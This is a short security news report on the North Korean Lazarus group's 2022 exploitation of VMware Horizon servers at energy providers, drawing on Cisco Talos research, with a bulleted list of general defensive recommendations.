The North Korean APT group ‘Lazarus’ (APT38) is exploiting VMWare Horizon servers to access the corporate networks of energy providers in the United States, Canada, and Japan. Lazarus is a state-backed threat actor known for conducting espionage, data theft, and cryptocurrency stealing campaigns over the past decade. The threat actors are responsible for hundreds of sophisticated attacks internationally. According to researchers at Cisco Talos who uncovered the latest operation, Lazarus targeted energy organizations between February and July 2022, leveraging public VMWare Horizon exploits for initial access. From there, they used custom malware families like ‘VSingle’ and ‘YamaBot’ and a previously unknown Remote Access Trojan (RAT) named ‘MagicRAT’ to search for and steal data from infected devices. Cisco Talos presents several attack strategies that illustrate Lazarus’ latest techniques, tactics, and procedures (TTPs) and highlight the versatility of the sophisticated hacking group. In the first case, the threat actors exploit VMWare servers vulnerable to Log4Shell flaws to run shellcode that establishes a reverse shell for running arbitrary commands on the compromised endpoint. In the second case presented in the report, which concerns a different victim, the initial access and reconnaissance follow similar patterns, but this time, the hackers dropped MagicRAT along with VSingle. In the third intrusion case, Lazarus deployed YamaBot, a custom malware written in Go, featuring standard RAT capabilities. The idea behind these variations is to mix up TTPs and make attribution, detection, and defense more challenging for incident responders. As highlighted in this report, Lazarus is closely monitored by cybersecurity firms, so they can’t afford to become lazy in diversifying their attack chains.
To protect against sophisticated attacks such as those carried out by the Lazarus group, organizations should:
• Regularly back up data, air gap, and password protect backup copies offline.
• Ensure copies of critical data are not accessible for modification or deletion from the system where the data resides.
• Implement network segmentation.
• Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, secure location (i.e., hard drive, storage device, the cloud).
• Install updates/patch operating systems, software, and firmware as soon as practical after they are released. Implement monitoring of security events on employee workstations and servers, with a 24/7 Security Operations Center to detect threats and respond quickly.
• Use multi-factor authentication where possible.
• Use strong passwords and regularly change passwords to network systems and accounts, implementing the shortest acceptable timeframe for password changes.
• Avoid reusing passwords for multiple accounts.
• Focus on cyber security awareness and training.
• Regularly provide users with training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities.